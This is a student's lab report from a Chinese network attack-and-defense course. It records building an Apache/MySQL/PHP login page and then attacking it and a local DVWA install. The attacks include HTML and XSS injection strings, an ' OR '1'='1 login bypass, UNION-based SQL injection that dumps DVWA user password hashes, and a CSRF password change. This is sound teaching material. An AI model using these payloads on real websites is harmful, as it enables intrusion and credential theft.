20232322 2025-2026-1 《网络与系统攻防技术》实验八实验报告

一.实验内容

• Web前端HTML：能正常安装、启停Apache。理解HTML，理解表单，理解GET与POST方法，编写一个含有表单的HTML
• Web前端javascipt：理解JavaScript的基本功能，理解DOM。在（1）的基础上，编写JavaScript验证用户名、密码的规则。在用户点击登陆按钮后回显“欢迎+输入的用户名”尝试注入攻击：利用回显用户名注入HTML及JavaScript
• Web后端：MySQL基础：正常安装、启动MySQL，建库、创建用户、修改密码、建表
• Web后端：编写PHP网页，连接数据库，进行用户认证
• 最简单的SQL注入，XSS攻击测试
• 安装DVWA或WebGoat平台，并完成SQL注入、XSS、CSRF攻击

二.实验目的

搭建Web环境，实现前后端开发，实践SQL注入、XSS等常见Web安全漏洞

三.实验环境

• kali linux虚拟机
  

四.实验过程与分析

1.Web前端HTML

• 通过 systemctl start apache2 启动Apache服务
  
  打开浏览器，输入localhost，出现以下界面说明Apache Web服务器安装成功
  
• 进入/var/www/html目录，创建两个html文件分别使用GET和POST方法编写一个含有表单的HTML。
  • GET:
    
    GET方法数据会在URL中显示,不适合传输密码
  • POST:
    
    POST方法数据不会在URL中显示，更加安全

2.Web前端JavaScript

• 原HTML上加入输入的验证
  • 用户名不能为空
    
  • 密码不能为空
    
  • 密码至少8位
    
• 注入攻击
  • 在用户名输入框中输入：<u>HTML injection succeed.</u>,HTML injection succeed.会被回显到页面，并且以下划线的形式展示
    
  • 在用户名输入框中输入：<img src='x' onerror='document.body.innerHTML = "JavaScript injection succeed."'>，出现下图表示成功
    

3. Web后端MySQL基础

通过 systemctl start mysql 打开MySQL服务

进行如下配置

CREATE DATABASE 20232322db;-- 创建数据库
USE 20232322db;-- 使用数据库
CREATE USER 'user1' IDENTIFIED BY 'user@20232322';-- 创建用户
GRANT ALL PRIVILEGES ON 20232322db.* TO 'user1';-- 授予用户权限
FLUSH PRIVILEGES;--刷新权限
ALTER USER 'user1' IDENTIFIED BY 'user@2322';-- 修改用户密码
CREATE TABLE tablefirst ( id INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) NOT NULL, pwd VARCHAR(255) NOT NULL );-- 创建表
INSERT INTO testtable (name, pwd) VALUES ('user1', '20232322');-- 插入数据
SELECT * FROM tablefirst;-- 查看表中所有内容

4.Web后端编写PHP网页

• 编写完成后输入数据库中的用户与密码验证
  
• 密码错误
  

5.SQL注入与XSS注入

• SQL注入，用户名随意，密码输入' OR '1'='1即可成功登录
  
  
• XSS攻击，在用户名输入框内注入<img src=x onerror=alert('XSS成功')>,密码随意，出现下图情况，成功
  

6.安装DVWA或WebGoat平台，并完成SQL注入，XSS，CSRF攻击

• 通过 sudo apt install dvwa 安装DVWA，输入 dvwa-start 开启dvwa
• 修改安全等级为low
  
• 进行sql注入：
  • 输入1
    
  • 使用1' order by 1 #,1' order by 2 #数字逐渐递加，直到n
    发现到第三个的时候报错，说明有两个字段
    
  • 输入 输入1' union SELECT DATABASE()，2 # 获取当前使用的数据库名
    
  • 输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'dvwa' #获取数据库的表名
    
    可以看到有guestbook、access_log、user、security_log4张表
  • 输入1' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' #获取表user中的字段
    
  • 输入1' or 1 = 1 union select group_concat(user_id),group_concat(password) from users #直接获取user中的password字段
    
    第一个密码即为admin的密码
  • 在加密网站中解密pasword字段进行验证
    
• xss攻击
  • 输入xss，输入内容会显示到页面和URL中
    
  • 输入<script>alert('XSS')
    
  • 使用Stored
    
    输入<script>alert('lady_killer9')</script>
    
  • 使用DOM
    点击select，URL中default参数会显示提交的内容。
    改变default为<script>alert('XSS')</script>
    
  • CSRF攻击
    修改密码
    
    修改后的密码会显示在URL中，我们使用修改后的密码登陆admin验证一下
    

五.问题及解决方案

问题：在php网页中一直报错网络错误
解决方案：启动php服务器并将php文件放入var/www/html中，通过http://localhost/20232322php.html登录

六.学习感悟

通过本次实验，我明白了安全漏洞的普遍性与危险性，使最简单的代码也可能存在严重漏洞。同时也提升了我的安全意识，安全是开发过程中必须考虑的重点，每个输入点都可能是潜在的攻击入口，这就要求我们对于漏洞原理要有深刻理解。